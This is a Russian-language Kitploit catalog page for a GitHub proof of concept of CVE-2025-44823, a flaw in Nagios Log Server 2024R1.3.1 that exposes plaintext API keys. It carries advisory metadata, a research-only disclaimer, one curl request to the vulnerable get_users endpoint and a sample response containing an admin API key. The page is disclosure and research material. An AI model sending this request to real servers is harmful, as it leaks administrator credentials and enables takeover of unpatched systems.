Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-44823 — Раскрытие аутентифицированного ключа API в Nagios Log Server 2024R1.3.1 | Kitploit
Инструменты/GitHubGitHub/skraft9/cve-2025-44823
Повышение привилегийАнализ уязвимостейЭксплуатацияСбор информацииАутентификацияБезопасность API
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Раскрытие аутентифицированного ключа API в Nagios Log Server 2024R1.3.1

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость раскрытия API-ключей в Nagios Log Server 2024R1.3.1

▶️ PoC Demo

Идентификатор CVE: CVE-2025-44823

Дата: 2025-04-02

Авторы: Alex Tisdale, Seth Kraft

Сайт вендора: https://www.nagios.com/

Журнал изменений вендора: https://www.nagios.com/changelog/#log-server

Ссылка на ПО: https://assets.nagios.com/downloads/nagios-log-server/versions.php

Версия: 2024R1.3.1 и ниже

Протестировано на: Nagios Log Server 2024R1.3.1 (конфигурация по умолчанию, Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Авторизация

Только для исследовательских и авторизованных целей. Пожалуйста, не используйте против систем без разрешения.

Описание

Уязвимость на уровне API в Nagios Log Server 2024R1.3.1 позволяет любому пользователю с действительным API-токеном получить полный список учётных записей вместе с их API-ключами в открытом виде, включая учётные данные администратора. Эта ошибка позволяет перечислять пользователей, повышать привилегии и осуществлять полную компрометацию системы через несанкционированное использование раскрытых токенов.

PoC

Шаг 1: Доступ к уязвимой конечной точке

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

Пример ответа

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
Скачать инструмент